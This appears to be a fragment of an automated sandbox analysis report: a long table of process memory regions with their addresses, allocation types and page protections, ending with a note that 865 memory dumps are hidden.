|
||
|
669B000
|
heap
|
page read and write
|
||
|
24120000
|
heap
|
page read and write
|
||
|
240F8000
|
heap
|
page read and write
|
||
|
21453814000
|
heap
|
page read and write
|
||
|
2190000
|
trusted library allocation
|
page read and write
|
||
|
218D000
|
trusted library allocation
|
page execute and read and write
|
||
|
303E000
|
unkown
|
page read and write
|
||
|
241ED000
|
trusted library allocation
|
page read and write
|
||
|
2258053C000
|
trusted library allocation
|
page read and write
|
||
|
22580918000
|
trusted library allocation
|
page read and write
|
||
|
24670000
|
trusted library allocation
|
page read and write
|
||
|
24663000
|
trusted library allocation
|
page read and write
|
||
|
22103000
|
trusted library allocation
|
page read and write
|
||
|
21CA0000
|
remote allocation
|
page read and write
|
||
|
A5CBC4E000
|
stack
|
page read and write
|
||
|
24670000
|
trusted library allocation
|
page read and write
|
||
|
7FF888620000
|
trusted library allocation
|
page read and write
|
||
|
65F0000
|
direct allocation
|
page read and write
|
||
|
6700000
|
heap
|
page read and write
|
||
|
225F28F5000
|
heap
|
page read and write
|
||
|
24670000
|
trusted library allocation
|
page read and write
|
||
|
7FF8885C0000
|
trusted library allocation
|
page read and write
|
||
|
24660000
|
trusted library allocation
|
page read and write
|
||
|
21C3C000
|
stack
|
page read and write
|
||
|
2FF0000
|
heap
|
page read and write
|
||
|
67E0000
|
heap
|
page read and write
|
||
|
72AF000
|
stack
|
page read and write
|
||
|
24670000
|
trusted library allocation
|
page read and write
|
||
|
225F29A4000
|
heap
|
page read and write
|
||
|
7552000
|
trusted library allocation
|
page read and write
|
||
|
22581566000
|
trusted library allocation
|
page read and write
|
||
|
7FF8885D0000
|
trusted library allocation
|
page read and write
|
||
|
214537F2000
|
heap
|
page read and write
|
||
|
21453AEA000
|
heap
|
page read and write
|
||
|
241E0000
|
trusted library allocation
|
page read and write
|
||
|
21FAB000
|
trusted library allocation
|
page read and write
|
||
|
21A6000
|
trusted library allocation
|
page execute and read and write
|
||
|
214537DD000
|
heap
|
page read and write
|
||
|
2E7E000
|
stack
|
page read and write
|
||
|
24201000
|
heap
|
page read and write
|
||
|
225F4520000
|
heap
|
page read and write
|
||
|
28CA34D0000
|
heap
|
page read and write
|
||
|
26C0000
|
heap
|
page read and write
|
||
|
4E8E000
|
stack
|
page read and write
|
||
|
24660000
|
trusted library allocation
|
page read and write
|
||
|
22580B66000
|
trusted library allocation
|
page read and write
|
||
|
2415D000
|
heap
|
page read and write
|
||
|
47DE000
|
stack
|
page read and write
|
||
|
24660000
|
trusted library allocation
|
page read and write
|
||
|
2950000
|
heap
|
page read and write
|
||
|
28CA1930000
|
heap
|
page read and write
|
||
|
48B3000
|
trusted library allocation
|
page read and write
|
||
|
A5CAE78000
|
stack
|
page read and write
|
||
|
24670000
|
trusted library allocation
|
page read and write
|
||
|
2DBF000
|
stack
|
page read and write
|
||
|
A5CAFFC000
|
stack
|
page read and write
|
||
|
2184000
|
trusted library allocation
|
page read and write
|
||
|
2258220F000
|
trusted library allocation
|
page read and write
|
||
|
24670000
|
trusted library allocation
|
page read and write
|
||
|
329F000
|
unkown
|
page read and write
|
||
|
225F4C00000
|
heap
|
page read and write
|
||
|
24660000
|
trusted library allocation
|
page read and write
|
||
|
49FE000
|
stack
|
page read and write
|
||
|
24F60000
|
trusted library allocation
|
page read and write
|
||
|
6FC0000
|
heap
|
page read and write
|
||
|
21B6E000
|
stack
|
page read and write
|
||
|
7FF8885E0000
|
trusted library allocation
|
page read and write
|
||
|
8280000
|
heap
|
page read and write
|
||
|
9750000
|
trusted library allocation
|
page read and write
|
||
|
5879000
|
trusted library allocation
|
page read and write
|
||
|
22580522000
|
trusted library allocation
|
page read and write
|
||
|
7FF888560000
|
trusted library allocation
|
page read and write
|
||
|
22010000
|
trusted library allocation
|
page read and write
|
||
|
24670000
|
trusted library allocation
|
page read and write
|
||
|
7F870000
|
trusted library allocation
|
page execute and read and write
|
||
|
66E5000
|
heap
|
page read and write
|
||
|
24F70000
|
trusted library allocation
|
page read and write
|
||
|
6750000
|
heap
|
page read and write
|
||
|
7520000
|
trusted library allocation
|
page read and write
|
||
|
240C0000
|
trusted library allocation
|
page read and write
|
||
|
214537E0000
|
heap
|
page read and write
|
||
|
21453814000
|
heap
|
page read and write
|
||
|
960C000
|
stack
|
page read and write
|
||
|
2ECD000
|
trusted library allocation
|
page execute and read and write
|
||
|
82CF000
|
heap
|
page read and write
|
||
|
8220000
|
heap
|
page read and write
|
||
|
812FBFD000
|
stack
|
page read and write
|
||
|
7FF8884A2000
|
trusted library allocation
|
page read and write
|
||
|
24DE0000
|
trusted library allocation
|
page read and write
|
||
|
7366000
|
heap
|
page read and write
|
||
|
22581E36000
|
trusted library allocation
|
page read and write
|
||
|
6E60000
|
direct allocation
|
page read and write
|
||
|
214537FD000
|
heap
|
page read and write
|
||
|
7700000
|
trusted library allocation
|
page read and write
|
||
|
22050000
|
trusted library allocation
|
page read and write
|
||
|
21FB2000
|
trusted library allocation
|
page read and write
|
||
|
22581C00000
|
trusted library allocation
|
page read and write
|
||
|
2145384F000
|
heap
|
page read and write
|
||
|
7120000
|
direct allocation
|
page read and write
|
||
|
56E000
|
stack
|
page read and write
|
||
|
225F2C50000
|
heap
|
page read and write
|
||
|
22581FC8000
|
trusted library allocation
|
page read and write
|
||
|
5FF4000
|
remote allocation
|
page execute and read and write
|
||
|
7FF888570000
|
trusted library allocation
|
page read and write
|
||
|
21D40000
|
direct allocation
|
page read and write
|
||
|
6E7ECFD000
|
stack
|
page read and write
|
||
|
21FBA000
|
trusted library allocation
|
page read and write
|
||
|
971D000
|
stack
|
page read and write
|
||
|
2D70000
|
heap
|
page read and write
|
||
|
28CA1B10000
|
heap
|
page read and write
|
||
|
24670000
|
trusted library allocation
|
page read and write
|
||
|
225F2870000
|
heap
|
page read and write
|
||
|
22580540000
|
trusted library allocation
|
page read and write
|
||
|
22581DB8000
|
trusted library allocation
|
page read and write
|
||
|
24660000
|
trusted library allocation
|
page read and write
|
||
|
24660000
|
trusted library allocation
|
page read and write
|
||
|
6E80000
|
direct allocation
|
page read and write
|
||
|
2F30000
|
heap
|
page read and write
|
||
|
225F2C59000
|
heap
|
page read and write
|
||
|
9800000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FF88847A000
|
trusted library allocation
|
page read and write
|
||
|
21B7000
|
trusted library allocation
|
page execute and read and write
|
||
|
21A5D000
|
stack
|
page read and write
|
||
|
24F70000
|
trusted library allocation
|
page read and write
|
||
|
22580538000
|
trusted library allocation
|
page read and write
|
||
|
2E80000
|
heap
|
page read and write
|
||
|
225F2917000
|
heap
|
page read and write
|
||
|
A5CAF79000
|
stack
|
page read and write
|
||
|
7FF8882E0000
|
trusted library allocation
|
page read and write
|
||
|
225F28FF000
|
heap
|
page read and write
|
||
|
6D4E000
|
stack
|
page read and write
|
||
|
2CB0000
|
heap
|
page read and write
|
||
|
7FF888510000
|
trusted library allocation
|
page read and write
|
||
|
246F0000
|
trusted library allocation
|
page read and write
|
||
|
6D0E000
|
stack
|
page read and write
|
||
|
6C4E000
|
stack
|
page read and write
|
||
|
A7D000
|
stack
|
page read and write
|
||
|
76AD000
|
stack
|
page read and write
|
||
|
24660000
|
trusted library allocation
|
page read and write
|
||
|
31B0000
|
heap
|
page read and write
|
||
|
24670000
|
trusted library allocation
|
page read and write
|
||
|
214537FD000
|
heap
|
page read and write
|
||
|
6470000
|
heap
|
page read and write
|
||
|
225F4385000
|
heap
|
page read and write
|
||
|
22590010000
|
trusted library allocation
|
page read and write
|
||
|
21453AE8000
|
heap
|
page read and write
|
||
|
21FE0000
|
trusted library allocation
|
page read and write
|
||
|
2FC8000
|
heap
|
page read and write
|
||
|
48BF000
|
stack
|
page read and write
|
||
|
214537FD000
|
heap
|
page read and write
|
||
|
225F4C7D000
|
heap
|
page read and write
|
||
|
6477000
|
heap
|
page read and write
|
||
|
241E0000
|
trusted library allocation
|
page read and write
|
||
|
24670000
|
trusted library allocation
|
page read and write
|
||
|
76D0000
|
trusted library allocation
|
page read and write
|
||
|
24680000
|
trusted library allocation
|
page read and write
|
||
|
24667000
|
trusted library allocation
|
page read and write
|
||
|
225F4CB3000
|
heap
|
page read and write
|
||
|
24670000
|
trusted library allocation
|
page read and write
|
||
|
24670000
|
trusted library allocation
|
page read and write
|
||
|
24670000
|
trusted library allocation
|
page read and write
|
||
|
225F4FD0000
|
heap
|
page read and write
|
||
|
58B7000
|
trusted library allocation
|
page read and write
|
||
|
8170000
|
trusted library allocation
|
page read and write
|
||
|
214537E9000
|
heap
|
page read and write
|
||
|
9820000
|
direct allocation
|
page read and write
|
||
|
7FF888650000
|
trusted library allocation
|
page read and write
|
||
|
24F70000
|
trusted library allocation
|
page read and write
|
||
|
24660000
|
trusted library allocation
|
page read and write
|
||
|
26C8000
|
heap
|
page read and write
|
||
|
4851000
|
trusted library allocation
|
page read and write
|
||
|
76E0000
|
trusted library allocation
|
page read and write
|
||
|
24670000
|
trusted library allocation
|
page read and write
|
||
|
2FA0000
|
trusted library allocation
|
page read and write
|
||
|
7FF8882DB000
|
trusted library allocation
|
page read and write
|
||
|
225F45F0000
|
heap
|
page read and write
|
||
|
241E0000
|
trusted library allocation
|
page read and write
|
||
|
246A0000
|
trusted library allocation
|
page read and write
|
||
|
24680000
|
trusted library allocation
|
page read and write
|
||
|
2FFB000
|
heap
|
page read and write
|
||
|
225902F6000
|
trusted library allocation
|
page read and write
|
||
|
24660000
|
trusted library allocation
|
page read and write
|
||
|
7760000
|
heap
|
page read and write
|
||
|
24660000
|
trusted library allocation
|
page read and write
|
||
|
22581C43000
|
trusted library allocation
|
page read and write
|
||
|
A5CADFE000
|
stack
|
page read and write
|
||
|
24F70000
|
trusted library allocation
|
page read and write
|
||
|
24F70000
|
trusted library allocation
|
page read and write
|
||
|
21453AEE000
|
heap
|
page read and write
|
||
|
225F4A10000
|
heap
|
page read and write
|
||
|
2F32000
|
heap
|
page read and write
|
||
|
230D0000
|
trusted library allocation
|
page read and write
|
||
|
24670000
|
trusted library allocation
|
page read and write
|
||
|
24690000
|
trusted library allocation
|
page read and write
|
||
|
24660000
|
trusted library allocation
|
page read and write
|
||
|
24660000
|
trusted library allocation
|
page read and write
|
||
|
7381000
|
heap
|
page read and write
|
||
|
4810000
|
heap
|
page read and write
|
||
|
24660000
|
trusted library allocation
|
page read and write
|
||
|
22580228000
|
trusted library allocation
|
page read and write
|
||
|
76F0000
|
trusted library allocation
|
page read and write
|
||
|
688E000
|
stack
|
page read and write
|
||
|
6CCE000
|
stack
|
page read and write
|
||
|
240C0000
|
trusted library allocation
|
page read and write
|
||
|
2413A000
|
heap
|
page read and write
|
||
|
7500000
|
trusted library allocation
|
page execute and read and write
|
||
|
24F80000
|
trusted library allocation
|
page read and write
|
||
|
21453710000
|
heap
|
page read and write
|
||
|
65C0000
|
direct allocation
|
page read and write
|
||
|
821E000
|
stack
|
page read and write
|
||
|
2DE0000
|
heap
|
page read and write
|
||
|
24F70000
|
trusted library allocation
|
page read and write
|
||
|
426C000
|
stack
|
page read and write
|
||
|
65A0000
|
direct allocation
|
page read and write
|
||
|
214536F0000
|
heap
|
page read and write
|
||
|
6730000
|
direct allocation
|
page read and write
|
||
|
6360000
|
heap
|
page read and write
|
||
|
225902E8000
|
trusted library allocation
|
page read and write
|
||
|
24670000
|
trusted library allocation
|
page read and write
|
||
|
241E0000
|
trusted library allocation
|
page read and write
|
||
|
246A0000
|
trusted library allocation
|
page read and write
|
||
|
225F28B0000
|
heap
|
page read and write
|
||
|
22590306000
|
trusted library allocation
|
page read and write
|
||
|
24660000
|
trusted library allocation
|
page read and write
|
||
|
240AC000
|
stack
|
page read and write
|
||
|
24690000
|
trusted library allocation
|
page read and write
|
||
|
2D14000
|
heap
|
page read and write
|
||
|
7FF8884D0000
|
trusted library allocation
|
page read and write
|
||
|
9490000
|
trusted library allocation
|
page read and write
|
||
|
FD9B77F000
|
stack
|
page read and write
|
||
|
246C0000
|
trusted library allocation
|
page read and write
|
||
|
5F5000
|
unkown
|
page readonly
|
||
|
7DF47E0C0000
|
trusted library allocation
|
page execute and read and write
|
||
|
24660000
|
trusted library allocation
|
page read and write
|
||
|
24192000
|
heap
|
page read and write
|
||
|
214537DE000
|
heap
|
page read and write
|
||
|
812F4FE000
|
stack
|
page read and write
|
||
|
28CA1938000
|
heap
|
page read and write
|
||
|
21A1E000
|
stack
|
page read and write
|
||
|
24147000
|
heap
|
page read and write
|
||
|
82EC000
|
heap
|
page read and write
|
||
|
225F42E0000
|
trusted library allocation
|
page read and write
|
||
|
5F7000
|
unkown
|
page readonly
|
||
|
24670000
|
trusted library allocation
|
page read and write
|
||
|
66F3000
|
heap
|
page read and write
|
||
|
241E0000
|
trusted library allocation
|
page read and write
|
||
|
48FD000
|
stack
|
page read and write
|
||
|
A78000
|
stack
|
page read and write
|
||
|
669F000
|
heap
|
page read and write
|
||
|
225F45B0000
|
heap
|
page read and write
|
||
|
24670000
|
trusted library allocation
|
page read and write
|
||
|
24199000
|
heap
|
page read and write
|
||
|
24680000
|
trusted library allocation
|
page read and write
|
||
|
218CE370000
|
heap
|
page read and write
|
||
|
1AE000
|
stack
|
page read and write
|
||
|
24670000
|
trusted library allocation
|
page read and write
|
||
|
21453848000
|
heap
|
page read and write
|
||
|
24124000
|
heap
|
page read and write
|
||
|
812FEFB000
|
stack
|
page read and write
|
||
|
812F6FE000
|
stack
|
page read and write
|
||
|
24F70000
|
trusted library allocation
|
page read and write
|
||
|
49B9000
|
stack
|
page read and write
|
||
|
5F5000
|
unkown
|
page readonly
|
||
|
6C0E000
|
stack
|
page read and write
|
||
|
65B0000
|
direct allocation
|
page read and write
|
||
|
41F4000
|
remote allocation
|
page execute and read and write
|
||
|
2D0E000
|
stack
|
page read and write
|
||
|
502E000
|
stack
|
page read and write
|
||
|
2145377A000
|
heap
|
page read and write
|
||
|
2CD0000
|
heap
|
page read and write
|
||
|
7543000
|
trusted library allocation
|
page read and write
|
||
|
24680000
|
trusted library allocation
|
page read and write
|
||
|
225F4290000
|
trusted library allocation
|
page read and write
|
||
|
7384000
|
heap
|
page read and write
|
||
|
82A8000
|
heap
|
page read and write
|
||
|
75A0000
|
heap
|
page execute and read and write
|
||
|
5F5000
|
unkown
|
page readonly
|
||
|
21ECE000
|
stack
|
page read and write
|
||
|
225F4C6A000
|
heap
|
page read and write
|
||
|
214537CD000
|
heap
|
page read and write
|
||
|
7FF8884B0000
|
trusted library allocation
|
page execute and read and write
|
||
|
24670000
|
trusted library allocation
|
page read and write
|
||
|
225F42A0000
|
heap
|
page readonly
|
||
|
21B20000
|
trusted library allocation
|
page read and write
|
||
|
22581C2F000
|
trusted library allocation
|
page read and write
|
||
|
22580B58000
|
trusted library allocation
|
page read and write
|
||
|
21ED0000
|
heap
|
page read and write
|
||
|
59DD000
|
trusted library allocation
|
page read and write
|
||
|
21453844000
|
heap
|
page read and write
|
||
|
21CDE000
|
stack
|
page read and write
|
||
|
2415D000
|
heap
|
page read and write
|
||
|
CAC4000
|
direct allocation
|
page execute and read and write
|
||
|
7F930000
|
trusted library allocation
|
page execute and read and write
|
||
|
24DF0000
|
trusted library allocation
|
page read and write
|
||
|
21AA000
|
trusted library allocation
|
page execute and read and write
|
||
|
49A8000
|
trusted library allocation
|
page read and write
|
||
|
160000
|
heap
|
page read and write
|
||
|
5F1000
|
unkown
|
page execute read
|
||
|
246C0000
|
trusted library allocation
|
page read and write
|
||
|
21A9E000
|
stack
|
page read and write
|
||
|
493C000
|
stack
|
page read and write
|
||
|
24660000
|
trusted library allocation
|
page read and write
|
||
|
241ED000
|
trusted library allocation
|
page read and write
|
||
|
22580693000
|
trusted library allocation
|
page read and write
|
||
|
21CA0000
|
remote allocation
|
page read and write
|
||
|
812FCFE000
|
stack
|
page read and write
|
||
|
7309000
|
heap
|
page read and write
|
||
|
6475000
|
heap
|
page read and write
|
||
|
6E40000
|
direct allocation
|
page read and write
|
||
|
24680000
|
trusted library allocation
|
page read and write
|
||
|
24670000
|
trusted library allocation
|
page read and write
|
||
|
24670000
|
trusted library allocation
|
page read and write
|
||
|
24670000
|
trusted library allocation
|
page read and write
|
||
|
55F4000
|
remote allocation
|
page execute and read and write
|
||
|
24660000
|
trusted library allocation
|
page read and write
|
||
|
735A000
|
heap
|
page read and write
|
||
|
66E5000
|
heap
|
page read and write
|
||
|
73B0000
|
trusted library allocation
|
page read and write
|
||
|
6702000
|
heap
|
page read and write
|
There are 865 hidden memdumps, click here to show them.